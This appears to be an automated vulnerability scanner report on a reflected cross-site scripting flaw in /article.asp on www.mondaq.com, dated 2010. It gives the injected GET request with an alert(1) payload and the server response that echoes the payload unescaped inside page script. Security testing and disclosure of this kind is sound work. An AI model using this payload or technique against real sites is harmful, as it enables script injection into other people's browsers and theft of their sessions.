1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.mondaq.com |
Path: | /article.asp |
GET /article.asp?e830a"-alert(1)- Host: www.mondaq.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Fri, 12 Nov 2010 00:05:01 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET Content-Type: text/html; Charset=utf-8 Expires: Fri, 12 Nov 2010 00:05:01 GMT Set-Cookie: ASPSESSIONIDCCRSQBRT Cache-control: no-cache <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="robots" content="noindex, nofollow" /> <title>Invalid Parameter Passed</title> </head> <sc ...[SNIP]... <!--//begin var onArticle = 1; var hidePrint = 1; var normalPrint = 0; var printurl = "/article.asp"; var printqs = "e830a"-alert(1)- //--end--> ...[SNIP]... |